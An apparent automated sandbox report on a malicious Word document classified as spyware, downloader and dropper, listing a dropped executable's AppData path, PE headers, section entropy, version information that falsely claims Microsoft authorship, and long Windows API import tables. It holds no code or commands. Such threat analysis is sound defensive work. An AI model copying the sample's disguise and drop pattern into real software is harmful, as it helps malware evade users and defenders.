VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: Spyware, Downloader, Dropper |
INC_4807280588838_XJ.doc
Word Document
Created at 2019-09-16T11:04:00
Remarks
(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\AppData\Local\structsstructs\structsstructs.exe | Dropped File | Binary |
Suspicious
|
...
|
»
File Reputation Information
»
Severity |
Suspicious
|
First Seen | 2019-09-16 12:00 (UTC+2) |
Last Seen | 2019-09-16 12:12 (UTC+2) |
PE Information
»
Image Base | 0x400000 |
Entry Point | 0x42e095 |
Size Of Code | 0x45a00 |
Size Of Initialized Data | 0x33200 |
File Type | FileType.executable |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2019-09-16 05:31:32+00:00 |
Version Information (8)
»
CompanyName | MFC |
FileDescription | CHKBOOK |
FileVersion | 1, 0, 0, 1 |
InternalName | CHKBOOK |
LegalCopyright | © Microsoft Corporation. All rights reserved. |
OriginalFilename | CHKBOOK.exe |
ProductName | MFC CHKBOOK |
ProductVersion | 1, 0, 0, 1 |
Sections (4)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x45955 | 0x45a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.54 |
.rdata | 0x447000 | 0x131f0 | 0x13200 | 0x45e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.08 |
.data | 0x45b000 | 0x66b8 | 0x2a00 | 0x59000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.07 |
.rsrc | 0x462000 | 0x1d4dc | 0x1d600 | 0x5ba00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.19 |
Imports (10)
»
KERNEL32.dll (142)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileType | 0x0 | 0x447174 | 0x58058 | 0x56e58 | 0x1d7 |
GetStartupInfoA | 0x0 | 0x447178 | 0x5805c | 0x56e5c | 0x239 |
HeapCreate | 0x0 | 0x44717c | 0x58060 | 0x56e60 | 0x29f |
VirtualFree | 0x0 | 0x447180 | 0x58064 | 0x56e64 | 0x457 |
QueryPerformanceCounter | 0x0 | 0x447184 | 0x58068 | 0x56e68 | 0x354 |
TerminateProcess | 0x0 | 0x447188 | 0x5806c | 0x56e6c | 0x42d |
UnhandledExceptionFilter | 0x0 | 0x44718c | 0x58070 | 0x56e70 | 0x43e |
IsDebuggerPresent | 0x0 | 0x447190 | 0x58074 | 0x56e74 | 0x2d1 |
GetTimeZoneInformation | 0x0 | 0x447194 | 0x58078 | 0x56e78 | 0x26b |
GetCPInfo | 0x0 | 0x447198 | 0x5807c | 0x56e7c | 0x15b |
GetACP | 0x0 | 0x44719c | 0x58080 | 0x56e80 | 0x152 |
GetOEMCP | 0x0 | 0x4471a0 | 0x58084 | 0x56e84 | 0x213 |
IsValidCodePage | 0x0 | 0x4471a4 | 0x58088 | 0x56e88 | 0x2db |
GetTimeFormatA | 0x0 | 0x4471a8 | 0x5808c | 0x56e8c | 0x268 |
GetDateFormatA | 0x0 | 0x4471ac | 0x58090 | 0x56e90 | 0x1ae |
SetHandleCount | 0x0 | 0x4471b0 | 0x58094 | 0x56e94 | 0x3e8 |
GetConsoleCP | 0x0 | 0x4471b4 | 0x58098 | 0x56e98 | 0x183 |
GetConsoleMode | 0x0 | 0x4471b8 | 0x5809c | 0x56e9c | 0x195 |
LCMapStringA | 0x0 | 0x4471bc | 0x580a0 | 0x56ea0 | 0x2e1 |
LCMapStringW | 0x0 | 0x4471c0 | 0x580a4 | 0x56ea4 | 0x2e3 |
GetStringTypeA | 0x0 | 0x4471c4 | 0x580a8 | 0x56ea8 | 0x23d |
GetStringTypeW | 0x0 | 0x4471c8 | 0x580ac | 0x56eac | 0x240 |
GetLocaleInfoA | 0x0 | 0x4471cc | 0x580b0 | 0x56eb0 | 0x1e8 |
SetStdHandle | 0x0 | 0x4471d0 | 0x580b4 | 0x56eb4 | 0x3fc |
WriteConsoleA | 0x0 | 0x4471d4 | 0x580b8 | 0x56eb8 | 0x482 |
GetConsoleOutputCP | 0x0 | 0x4471d8 | 0x580bc | 0x56ebc | 0x199 |
WriteConsoleW | 0x0 | 0x4471dc | 0x580c0 | 0x56ec0 | 0x48c |
CreateFileA | 0x0 | 0x4471e0 | 0x580c4 | 0x56ec4 | 0x78 |
SetEnvironmentVariableA | 0x0 | 0x4471e4 | 0x580c8 | 0x56ec8 | 0x3d0 |
GetCommandLineW | 0x0 | 0x4471e8 | 0x580cc | 0x56ecc | 0x170 |
GetEnvironmentStringsW | 0x0 | 0x4471ec | 0x580d0 | 0x56ed0 | 0x1c1 |
FreeEnvironmentStringsW | 0x0 | 0x4471f0 | 0x580d4 | 0x56ed4 | 0x14b |
FindResourceW | 0x0 | 0x4471f4 | 0x580d8 | 0x56ed8 | 0x139 |
GetModuleFileNameA | 0x0 | 0x4471f8 | 0x580dc | 0x56edc | 0x1f4 |
GetStdHandle | 0x0 | 0x4471fc | 0x580e0 | 0x56ee0 | 0x23b |
SetUnhandledExceptionFilter | 0x0 | 0x447200 | 0x580e4 | 0x56ee4 | 0x415 |
VirtualAlloc | 0x0 | 0x447204 | 0x580e8 | 0x56ee8 | 0x454 |
HeapSize | 0x0 | 0x447208 | 0x580ec | 0x56eec | 0x2a6 |
ExitProcess | 0x0 | 0x44720c | 0x580f0 | 0x56ef0 | 0x104 |
Sleep | 0x0 | 0x447210 | 0x580f4 | 0x56ef4 | 0x421 |
RaiseException | 0x0 | 0x447214 | 0x580f8 | 0x56ef8 | 0x35a |
RtlUnwind | 0x0 | 0x447218 | 0x580fc | 0x56efc | 0x392 |
HeapReAlloc | 0x0 | 0x44721c | 0x58100 | 0x56f00 | 0x2a4 |
HeapAlloc | 0x0 | 0x447220 | 0x58104 | 0x56f04 | 0x29d |
GetSystemTimeAsFileTime | 0x0 | 0x447224 | 0x58108 | 0x56f08 | 0x24f |
HeapFree | 0x0 | 0x447228 | 0x5810c | 0x56f0c | 0x2a1 |
GetStartupInfoW | 0x0 | 0x44722c | 0x58110 | 0x56f10 | 0x23a |
GetTickCount | 0x0 | 0x447230 | 0x58114 | 0x56f14 | 0x266 |
SetErrorMode | 0x0 | 0x447234 | 0x58118 | 0x56f18 | 0x3d2 |
GetCurrentDirectoryW | 0x0 | 0x447238 | 0x5811c | 0x56f1c | 0x1a8 |
InterlockedIncrement | 0x0 | 0x44723c | 0x58120 | 0x56f20 | 0x2c0 |
TlsFree | 0x0 | 0x447240 | 0x58124 | 0x56f24 | 0x433 |
LocalReAlloc | 0x0 | 0x447244 | 0x58128 | 0x56f28 | 0x300 |
TlsSetValue | 0x0 | 0x447248 | 0x5812c | 0x56f2c | 0x435 |
TlsAlloc | 0x0 | 0x44724c | 0x58130 | 0x56f30 | 0x432 |
GlobalHandle | 0x0 | 0x447250 | 0x58134 | 0x56f34 | 0x28f |
GlobalReAlloc | 0x0 | 0x447254 | 0x58138 | 0x56f38 | 0x293 |
TlsGetValue | 0x0 | 0x447258 | 0x5813c | 0x56f3c | 0x434 |
LocalAlloc | 0x0 | 0x44725c | 0x58140 | 0x56f40 | 0x2f9 |
lstrlenA | 0x0 | 0x447260 | 0x58144 | 0x56f44 | 0x4b5 |
GlobalFlags | 0x0 | 0x447264 | 0x58148 | 0x56f48 | 0x28b |
EnterCriticalSection | 0x0 | 0x447268 | 0x5814c | 0x56f4c | 0xd9 |
LeaveCriticalSection | 0x0 | 0x44726c | 0x58150 | 0x56f50 | 0x2ef |
DeleteCriticalSection | 0x0 | 0x447270 | 0x58154 | 0x56f54 | 0xbe |
InitializeCriticalSection | 0x0 | 0x447274 | 0x58158 | 0x56f58 | 0x2b4 |
InterlockedDecrement | 0x0 | 0x447278 | 0x5815c | 0x56f5c | 0x2bc |
GetFileSizeEx | 0x0 | 0x44727c | 0x58160 | 0x56f60 | 0x1d5 |
SystemTimeToFileTime | 0x0 | 0x447280 | 0x58164 | 0x56f64 | 0x42a |
LocalFileTimeToFileTime | 0x0 | 0x447284 | 0x58168 | 0x56f68 | 0x2fb |
FileTimeToLocalFileTime | 0x0 | 0x447288 | 0x5816c | 0x56f6c | 0x10f |
FileTimeToSystemTime | 0x0 | 0x44728c | 0x58170 | 0x56f70 | 0x110 |
CreateFileW | 0x0 | 0x447290 | 0x58174 | 0x56f74 | 0x7f |
GetShortPathNameW | 0x0 | 0x447294 | 0x58178 | 0x56f78 | 0x238 |
GetVolumeInformationW | 0x0 | 0x447298 | 0x5817c | 0x56f7c | 0x279 |
FindFirstFileW | 0x0 | 0x44729c | 0x58180 | 0x56f80 | 0x124 |
FindClose | 0x0 | 0x4472a0 | 0x58184 | 0x56f84 | 0x119 |
GetCurrentProcess | 0x0 | 0x4472a4 | 0x58188 | 0x56f88 | 0x1a9 |
DuplicateHandle | 0x0 | 0x4472a8 | 0x5818c | 0x56f8c | 0xd4 |
CloseHandle | 0x0 | 0x4472ac | 0x58190 | 0x56f90 | 0x43 |
GetFileSize | 0x0 | 0x4472b0 | 0x58194 | 0x56f94 | 0x1d4 |
SetEndOfFile | 0x0 | 0x4472b4 | 0x58198 | 0x56f98 | 0x3cd |
UnlockFile | 0x0 | 0x4472b8 | 0x5819c | 0x56f9c | 0x43f |
LockFile | 0x0 | 0x4472bc | 0x581a0 | 0x56fa0 | 0x305 |
FlushFileBuffers | 0x0 | 0x4472c0 | 0x581a4 | 0x56fa4 | 0x141 |
SetFilePointer | 0x0 | 0x4472c4 | 0x581a8 | 0x56fa8 | 0x3df |
WriteFile | 0x0 | 0x4472c8 | 0x581ac | 0x56fac | 0x48d |
ReadFile | 0x0 | 0x4472cc | 0x581b0 | 0x56fb0 | 0x368 |
lstrcmpiW | 0x0 | 0x4472d0 | 0x581b4 | 0x56fb4 | 0x4ad |
GetThreadLocale | 0x0 | 0x4472d4 | 0x581b8 | 0x56fb8 | 0x25f |
GetStringTypeExW | 0x0 | 0x4472d8 | 0x581bc | 0x56fbc | 0x23f |
DeleteFileW | 0x0 | 0x4472dc | 0x581c0 | 0x56fc0 | 0xc3 |
MoveFileW | 0x0 | 0x4472e0 | 0x581c4 | 0x56fc4 | 0x316 |
GetPrivateProfileStringW | 0x0 | 0x4472e4 | 0x581c8 | 0x56fc8 | 0x21d |
WritePrivateProfileStringW | 0x0 | 0x4472e8 | 0x581cc | 0x56fcc | 0x493 |
GetPrivateProfileIntW | 0x0 | 0x4472ec | 0x581d0 | 0x56fd0 | 0x217 |
GetCurrentThread | 0x0 | 0x4472f0 | 0x581d4 | 0x56fd4 | 0x1ac |
ConvertDefaultLocale | 0x0 | 0x4472f4 | 0x581d8 | 0x56fd8 | 0x5a |
EnumResourceLanguagesW | 0x0 | 0x4472f8 | 0x581dc | 0x56fdc | 0xe9 |
lstrcmpA | 0x0 | 0x4472fc | 0x581e0 | 0x56fe0 | 0x4a9 |
GetLocaleInfoW | 0x0 | 0x447300 | 0x581e4 | 0x56fe4 | 0x1ea |
CompareStringA | 0x0 | 0x447304 | 0x581e8 | 0x56fe8 | 0x52 |
InterlockedExchange | 0x0 | 0x447308 | 0x581ec | 0x56fec | 0x2bd |
GlobalGetAtomNameW | 0x0 | 0x44730c | 0x581f0 | 0x56ff0 | 0x28e |
GetDiskFreeSpaceW | 0x0 | 0x447310 | 0x581f4 | 0x56ff4 | 0x1b7 |
GetFullPathNameW | 0x0 | 0x447314 | 0x581f8 | 0x56ff8 | 0x1df |
GetTempFileNameW | 0x0 | 0x447318 | 0x581fc | 0x56ffc | 0x259 |
GetFileTime | 0x0 | 0x44731c | 0x58200 | 0x57000 | 0x1d6 |
SetFileTime | 0x0 | 0x447320 | 0x58204 | 0x57004 | 0x3e3 |
GetFileAttributesW | 0x0 | 0x447324 | 0x58208 | 0x57008 | 0x1ce |
FreeResource | 0x0 | 0x447328 | 0x5820c | 0x5700c | 0x14f |
GetCurrentThreadId | 0x0 | 0x44732c | 0x58210 | 0x57010 | 0x1ad |
GlobalAddAtomW | 0x0 | 0x447330 | 0x58214 | 0x57014 | 0x284 |
GlobalFindAtomW | 0x0 | 0x447334 | 0x58218 | 0x57018 | 0x289 |
GlobalDeleteAtom | 0x0 | 0x447338 | 0x5821c | 0x5701c | 0x287 |
GetVersionExW | 0x0 | 0x44733c | 0x58220 | 0x57020 | 0x276 |
LoadLibraryW | 0x0 | 0x447340 | 0x58224 | 0x57024 | 0x2f4 |
FreeLibrary | 0x0 | 0x447344 | 0x58228 | 0x57028 | 0x14c |
CompareStringW | 0x0 | 0x447348 | 0x5822c | 0x5702c | 0x55 |
LoadLibraryA | 0x0 | 0x44734c | 0x58230 | 0x57030 | 0x2f1 |
lstrcmpW | 0x0 | 0x447350 | 0x58234 | 0x57034 | 0x4aa |
GetModuleHandleW | 0x0 | 0x447354 | 0x58238 | 0x57038 | 0x1f9 |
GetVersionExA | 0x0 | 0x447358 | 0x5823c | 0x5703c | 0x275 |
GetModuleHandleA | 0x0 | 0x44735c | 0x58240 | 0x57040 | 0x1f6 |
GetProcAddress | 0x0 | 0x447360 | 0x58244 | 0x57044 | 0x220 |
GlobalFree | 0x0 | 0x447364 | 0x58248 | 0x57048 | 0x28c |
GlobalAlloc | 0x0 | 0x447368 | 0x5824c | 0x5704c | 0x285 |
GlobalLock | 0x0 | 0x44736c | 0x58250 | 0x57050 | 0x290 |
GlobalUnlock | 0x0 | 0x447370 | 0x58254 | 0x57054 | 0x297 |
FormatMessageW | 0x0 | 0x447374 | 0x58258 | 0x57058 | 0x148 |
LocalFree | 0x0 | 0x447378 | 0x5825c | 0x5705c | 0x2fd |
lstrlenW | 0x0 | 0x44737c | 0x58260 | 0x57060 | 0x4b6 |
MulDiv | 0x0 | 0x447380 | 0x58264 | 0x57064 | 0x319 |
GetCurrentProcessId | 0x0 | 0x447384 | 0x58268 | 0x57068 | 0x1aa |
GetModuleFileNameW | 0x0 | 0x447388 | 0x5826c | 0x5706c | 0x1f5 |
GetLastError | 0x0 | 0x44738c | 0x58270 | 0x57070 | 0x1e6 |
SetLastError | 0x0 | 0x447390 | 0x58274 | 0x57074 | 0x3ec |
WideCharToMultiByte | 0x0 | 0x447394 | 0x58278 | 0x57078 | 0x47a |
LockResource | 0x0 | 0x447398 | 0x5827c | 0x5707c | 0x307 |
MultiByteToWideChar | 0x0 | 0x44739c | 0x58280 | 0x57080 | 0x31a |
SizeofResource | 0x0 | 0x4473a0 | 0x58284 | 0x57084 | 0x420 |
LoadResource | 0x0 | 0x4473a4 | 0x58288 | 0x57088 | 0x2f6 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x4473a8 | 0x5828c | 0x5708c | 0x2b5 |
USER32.dll (163)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RegisterClipboardFormatW | 0x0 | 0x4473f4 | 0x582d8 | 0x570d8 | 0x238 |
DeleteMenu | 0x0 | 0x4473f8 | 0x582dc | 0x570dc | 0x98 |
GetMenuItemInfoW | 0x0 | 0x4473fc | 0x582e0 | 0x570e0 | 0x145 |
InflateRect | 0x0 | 0x447400 | 0x582e4 | 0x570e4 | 0x1a1 |
GetSysColorBrush | 0x0 | 0x447404 | 0x582e8 | 0x570e8 | 0x16d |
DestroyCursor | 0x0 | 0x447408 | 0x582ec | 0x570ec | 0x9c |
SetRect | 0x0 | 0x44740c | 0x582f0 | 0x570f0 | 0x291 |
IsZoomed | 0x0 | 0x447410 | 0x582f4 | 0x570f4 | 0x1cc |
CreateDialogIndirectParamW | 0x0 | 0x447414 | 0x582f8 | 0x570f8 | 0x5b |
GetNextDlgTabItem | 0x0 | 0x447418 | 0x582fc | 0x570fc | 0x153 |
EndDialog | 0x0 | 0x44741c | 0x58300 | 0x57100 | 0xd3 |
GetMessageW | 0x0 | 0x447420 | 0x58304 | 0x57104 | 0x14e |
TranslateMessage | 0x0 | 0x447424 | 0x58308 | 0x57108 | 0x2d5 |
ValidateRect | 0x0 | 0x447428 | 0x5830c | 0x5710c | 0x2f2 |
CharUpperW | 0x0 | 0x44742c | 0x58310 | 0x57110 | 0x3a |
ShowOwnedPopups | 0x0 | 0x447430 | 0x58314 | 0x57114 | 0x2b4 |
PostQuitMessage | 0x0 | 0x447434 | 0x58318 | 0x57118 | 0x220 |
UnpackDDElParam | 0x0 | 0x447438 | 0x5831c | 0x5711c | 0x2dd |
ReuseDDElParam | 0x0 | 0x44743c | 0x58320 | 0x57120 | 0x253 |
LoadMenuW | 0x0 | 0x447440 | 0x58324 | 0x57124 | 0x1e1 |
DestroyMenu | 0x0 | 0x447444 | 0x58328 | 0x57128 | 0x9e |
LoadAcceleratorsW | 0x0 | 0x447448 | 0x5832c | 0x5712c | 0x1cf |
InsertMenuItemW | 0x0 | 0x44744c | 0x58330 | 0x57130 | 0x1a5 |
SetRectEmpty | 0x0 | 0x447450 | 0x58334 | 0x57134 | 0x292 |
GetDesktopWindow | 0x0 | 0x447454 | 0x58338 | 0x57138 | 0x11c |
RedrawWindow | 0x0 | 0x447458 | 0x5833c | 0x5713c | 0x232 |
TranslateAcceleratorW | 0x0 | 0x44745c | 0x58340 | 0x57140 | 0x2d3 |
TranslateMDISysAccel | 0x0 | 0x447460 | 0x58344 | 0x57144 | 0x2d4 |
BringWindowToTop | 0x0 | 0x447464 | 0x58348 | 0x57148 | 0x10 |
GetActiveWindow | 0x0 | 0x447468 | 0x5834c | 0x5714c | 0xf9 |
DrawMenuBar | 0x0 | 0x44746c | 0x58350 | 0x57150 | 0xc1 |
DefMDIChildProcW | 0x0 | 0x447470 | 0x58354 | 0x57154 | 0x93 |
DefFrameProcW | 0x0 | 0x447474 | 0x58358 | 0x57158 | 0x91 |
ShowWindow | 0x0 | 0x447478 | 0x5835c | 0x5715c | 0x2b8 |
IsDialogMessageW | 0x0 | 0x44747c | 0x58360 | 0x57160 | 0x1b9 |
SetDlgItemTextW | 0x0 | 0x447480 | 0x58364 | 0x57164 | 0x277 |
RegisterWindowMessageW | 0x0 | 0x447484 | 0x58368 | 0x57168 | 0x24a |
LoadIconW | 0x0 | 0x447488 | 0x5836c | 0x5716c | 0x1d7 |
SendDlgItemMessageW | 0x0 | 0x44748c | 0x58370 | 0x57170 | 0x25a |
SendDlgItemMessageA | 0x0 | 0x447490 | 0x58374 | 0x57174 | 0x259 |
WinHelpW | 0x0 | 0x447494 | 0x58378 | 0x57178 | 0x300 |
GetCapture | 0x0 | 0x447498 | 0x5837c | 0x5717c | 0x101 |
SetWindowsHookExW | 0x0 | 0x44749c | 0x58380 | 0x57180 | 0x2b0 |
CallNextHookEx | 0x0 | 0x4474a0 | 0x58384 | 0x57184 | 0x1b |
GetClassLongW | 0x0 | 0x4474a4 | 0x58388 | 0x57188 | 0x109 |
GetClassNameW | 0x0 | 0x4474a8 | 0x5838c | 0x5718c | 0x10b |
SetPropW | 0x0 | 0x4474ac | 0x58390 | 0x57190 | 0x290 |
GetPropW | 0x0 | 0x4474b0 | 0x58394 | 0x57194 | 0x15c |
RemovePropW | 0x0 | 0x4474b4 | 0x58398 | 0x57198 | 0x250 |
IsWindow | 0x0 | 0x4474b8 | 0x5839c | 0x5719c | 0x1c5 |
SetFocus | 0x0 | 0x4474bc | 0x583a0 | 0x571a0 | 0x279 |
GetForegroundWindow | 0x0 | 0x4474c0 | 0x583a4 | 0x571a4 | 0x125 |
SetActiveWindow | 0x0 | 0x4474c4 | 0x583a8 | 0x571a8 | 0x266 |
DispatchMessageW | 0x0 | 0x4474c8 | 0x583ac | 0x571ac | 0xa9 |
BeginDeferWindowPos | 0x0 | 0x4474cc | 0x583b0 | 0x571b0 | 0xd |
EndDeferWindowPos | 0x0 | 0x4474d0 | 0x583b4 | 0x571b4 | 0xd2 |
GetDlgItem | 0x0 | 0x4474d4 | 0x583b8 | 0x571b8 | 0x11f |
GetTopWindow | 0x0 | 0x4474d8 | 0x583bc | 0x571bc | 0x175 |
DestroyWindow | 0x0 | 0x4474dc | 0x583c0 | 0x571c0 | 0xa0 |
UnhookWindowsHookEx | 0x0 | 0x4474e0 | 0x583c4 | 0x571c4 | 0x2d9 |
GetMessageTime | 0x0 | 0x4474e4 | 0x583c8 | 0x571c8 | 0x14d |
GetMessagePos | 0x0 | 0x4474e8 | 0x583cc | 0x571cc | 0x14c |
PeekMessageW | 0x0 | 0x4474ec | 0x583d0 | 0x571d0 | 0x21c |
MapWindowPoints | 0x0 | 0x4474f0 | 0x583d4 | 0x571d4 | 0x1f3 |
ScrollWindow | 0x0 | 0x4474f4 | 0x583d8 | 0x571d8 | 0x257 |
TrackPopupMenu | 0x0 | 0x4474f8 | 0x583dc | 0x571dc | 0x2cf |
GetKeyState | 0x0 | 0x4474fc | 0x583e0 | 0x571e0 | 0x131 |
SetMenu | 0x0 | 0x447500 | 0x583e4 | 0x571e4 | 0x27f |
SetScrollRange | 0x0 | 0x447504 | 0x583e8 | 0x571e8 | 0x295 |
GetScrollRange | 0x0 | 0x447508 | 0x583ec | 0x571ec | 0x168 |
SetScrollPos | 0x0 | 0x44750c | 0x583f0 | 0x571f0 | 0x294 |
GetScrollPos | 0x0 | 0x447510 | 0x583f4 | 0x571f4 | 0x167 |
SetForegroundWindow | 0x0 | 0x447514 | 0x583f8 | 0x571f8 | 0x27a |
ShowScrollBar | 0x0 | 0x447518 | 0x583fc | 0x571fc | 0x2b5 |
IsWindowVisible | 0x0 | 0x44751c | 0x58400 | 0x57200 | 0x1ca |
PostMessageW | 0x0 | 0x447520 | 0x58404 | 0x57204 | 0x21f |
CreateWindowExW | 0x0 | 0x447524 | 0x58408 | 0x57208 | 0x68 |
GetClassInfoExW | 0x0 | 0x447528 | 0x5840c | 0x5720c | 0x106 |
GetClassInfoW | 0x0 | 0x44752c | 0x58410 | 0x57210 | 0x107 |
RegisterClassW | 0x0 | 0x447530 | 0x58414 | 0x57214 | 0x236 |
EqualRect | 0x0 | 0x447534 | 0x58418 | 0x57218 | 0xec |
DeferWindowPos | 0x0 | 0x447538 | 0x5841c | 0x5721c | 0x97 |
GetScrollInfo | 0x0 | 0x44753c | 0x58420 | 0x57220 | 0x166 |
SetScrollInfo | 0x0 | 0x447540 | 0x58424 | 0x57224 | 0x293 |
CopyRect | 0x0 | 0x447544 | 0x58428 | 0x57228 | 0x4f |
DefWindowProcW | 0x0 | 0x447548 | 0x5842c | 0x5722c | 0x96 |
CallWindowProcW | 0x0 | 0x44754c | 0x58430 | 0x57230 | 0x1d |
GetMenu | 0x0 | 0x447550 | 0x58434 | 0x57234 | 0x13c |
SetWindowLongW | 0x0 | 0x447554 | 0x58438 | 0x57238 | 0x2a5 |
SetWindowPos | 0x0 | 0x447558 | 0x5843c | 0x5723c | 0x2a7 |
IntersectRect | 0x0 | 0x44755c | 0x58440 | 0x57240 | 0x1a9 |
SystemParametersInfoA | 0x0 | 0x447560 | 0x58444 | 0x57244 | 0x2c4 |
GetWindowPlacement | 0x0 | 0x447564 | 0x58448 | 0x57248 | 0x187 |
GetWindow | 0x0 | 0x447568 | 0x5844c | 0x5724c | 0x17d |
EndPaint | 0x0 | 0x44756c | 0x58450 | 0x57250 | 0xd5 |
BeginPaint | 0x0 | 0x447570 | 0x58454 | 0x57254 | 0xe |
GetWindowDC | 0x0 | 0x447574 | 0x58458 | 0x57258 | 0x17f |
ReleaseDC | 0x0 | 0x447578 | 0x5845c | 0x5725c | 0x24c |
GetDC | 0x0 | 0x44757c | 0x58460 | 0x57260 | 0x11a |
EnableWindow | 0x0 | 0x447580 | 0x58464 | 0x57264 | 0xd1 |
GetSysColor | 0x0 | 0x447584 | 0x58468 | 0x57268 | 0x16c |
InvalidateRect | 0x0 | 0x447588 | 0x5846c | 0x5726c | 0x1aa |
wsprintfW | 0x0 | 0x44758c | 0x58470 | 0x57270 | 0x308 |
FillRect | 0x0 | 0x447590 | 0x58474 | 0x57274 | 0xef |
ScreenToClient | 0x0 | 0x447594 | 0x58478 | 0x57278 | 0x254 |
GrayStringW | 0x0 | 0x447598 | 0x5847c | 0x5727c | 0x194 |
DrawTextExW | 0x0 | 0x44759c | 0x58480 | 0x57280 | 0xc7 |
DrawTextW | 0x0 | 0x4475a0 | 0x58484 | 0x57284 | 0xc8 |
TabbedTextOutW | 0x0 | 0x4475a4 | 0x58488 | 0x57288 | 0x2c7 |
GetMenuStringW | 0x0 | 0x4475a8 | 0x5848c | 0x5728c | 0x149 |
AppendMenuW | 0x0 | 0x4475ac | 0x58490 | 0x57290 | 0xa |
GetMenuItemID | 0x0 | 0x4475b0 | 0x58494 | 0x57294 | 0x143 |
InsertMenuW | 0x0 | 0x4475b4 | 0x58498 | 0x57298 | 0x1a6 |
GetMenuItemCount | 0x0 | 0x4475b8 | 0x5849c | 0x5729c | 0x142 |
GetSubMenu | 0x0 | 0x4475bc | 0x584a0 | 0x572a0 | 0x16b |
RemoveMenu | 0x0 | 0x4475c0 | 0x584a4 | 0x572a4 | 0x24e |
GetSystemMetrics | 0x0 | 0x4475c4 | 0x584a8 | 0x572a8 | 0x16f |
GetCursorPos | 0x0 | 0x4475c8 | 0x584ac | 0x572ac | 0x119 |
ReleaseCapture | 0x0 | 0x4475cc | 0x584b0 | 0x572b0 | 0x24b |
UnregisterClassW | 0x0 | 0x4475d0 | 0x584b4 | 0x572b4 | 0x2df |
GetTabbedTextExtentA | 0x0 | 0x4475d4 | 0x584b8 | 0x572b8 | 0x170 |
PostThreadMessageW | 0x0 | 0x4475d8 | 0x584bc | 0x572bc | 0x222 |
CreateMenu | 0x0 | 0x4475dc | 0x584c0 | 0x572c0 | 0x64 |
CopyAcceleratorTableW | 0x0 | 0x4475e0 | 0x584c4 | 0x572c4 | 0x4c |
WindowFromPoint | 0x0 | 0x4475e4 | 0x584c8 | 0x572c8 | 0x303 |
DestroyIcon | 0x0 | 0x4475e8 | 0x584cc | 0x572cc | 0x9d |
GetWindowTextLengthW | 0x0 | 0x4475ec | 0x584d0 | 0x572d0 | 0x18e |
SendMessageW | 0x0 | 0x4475f0 | 0x584d4 | 0x572d4 | 0x263 |
UpdateWindow | 0x0 | 0x4475f4 | 0x584d8 | 0x572d8 | 0x2e9 |
SetWindowTextW | 0x0 | 0x4475f8 | 0x584dc | 0x572dc | 0x2ac |
GetWindowTextW | 0x0 | 0x4475fc | 0x584e0 | 0x572e0 | 0x18f |
GetClientRect | 0x0 | 0x447600 | 0x584e4 | 0x572e4 | 0x10d |
CheckMenuItem | 0x0 | 0x447604 | 0x584e8 | 0x572e8 | 0x3d |
EnableMenuItem | 0x0 | 0x447608 | 0x584ec | 0x572ec | 0xcf |
GetMenuState | 0x0 | 0x44760c | 0x584f0 | 0x572f0 | 0x147 |
ModifyMenuW | 0x0 | 0x447610 | 0x584f4 | 0x572f4 | 0x201 |
GetParent | 0x0 | 0x447614 | 0x584f8 | 0x572f8 | 0x155 |
GetFocus | 0x0 | 0x447618 | 0x584fc | 0x572fc | 0x124 |
LoadBitmapW | 0x0 | 0x44761c | 0x58500 | 0x57300 | 0x1d1 |
GetMenuCheckMarkDimensions | 0x0 | 0x447620 | 0x58504 | 0x57304 | 0x13e |
SetMenuItemBitmaps | 0x0 | 0x447624 | 0x58508 | 0x57308 | 0x283 |
AdjustWindowRectEx | 0x0 | 0x447628 | 0x5850c | 0x5730c | 0x3 |
IsIconic | 0x0 | 0x44762c | 0x58510 | 0x57310 | 0x1bd |
IsChild | 0x0 | 0x447630 | 0x58514 | 0x57314 | 0x1b5 |
GetDlgCtrlID | 0x0 | 0x447634 | 0x58518 | 0x57318 | 0x11e |
MessageBoxW | 0x0 | 0x447638 | 0x5851c | 0x5731c | 0x1ff |
IsWindowEnabled | 0x0 | 0x44763c | 0x58520 | 0x57320 | 0x1c6 |
GetLastActivePopup | 0x0 | 0x447640 | 0x58524 | 0x57324 | 0x138 |
GetWindowLongW | 0x0 | 0x447644 | 0x58528 | 0x57328 | 0x182 |
GetWindowThreadProcessId | 0x0 | 0x447648 | 0x5852c | 0x5732c | 0x190 |
SystemParametersInfoW | 0x0 | 0x44764c | 0x58530 | 0x57330 | 0x2c5 |
OffsetRect | 0x0 | 0x447650 | 0x58534 | 0x57334 | 0x20e |
DrawIcon | 0x0 | 0x447654 | 0x58538 | 0x57338 | 0xbf |
SetWindowRgn | 0x0 | 0x447658 | 0x5853c | 0x5733c | 0x2a8 |
GetWindowRect | 0x0 | 0x44765c | 0x58540 | 0x57340 | 0x188 |
ClientToScreen | 0x0 | 0x447660 | 0x58544 | 0x57344 | 0x45 |
SetTimer | 0x0 | 0x447664 | 0x58548 | 0x57348 | 0x29e |
KillTimer | 0x0 | 0x447668 | 0x5854c | 0x5734c | 0x1cd |
SetCapture | 0x0 | 0x44766c | 0x58550 | 0x57350 | 0x267 |
PtInRect | 0x0 | 0x447670 | 0x58554 | 0x57354 | 0x229 |
LoadCursorW | 0x0 | 0x447674 | 0x58558 | 0x57358 | 0x1d5 |
SetCursor | 0x0 | 0x447678 | 0x5855c | 0x5735c | 0x270 |
CreatePopupMenu | 0x0 | 0x44767c | 0x58560 | 0x57360 | 0x65 |
GDI32.dll (75)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
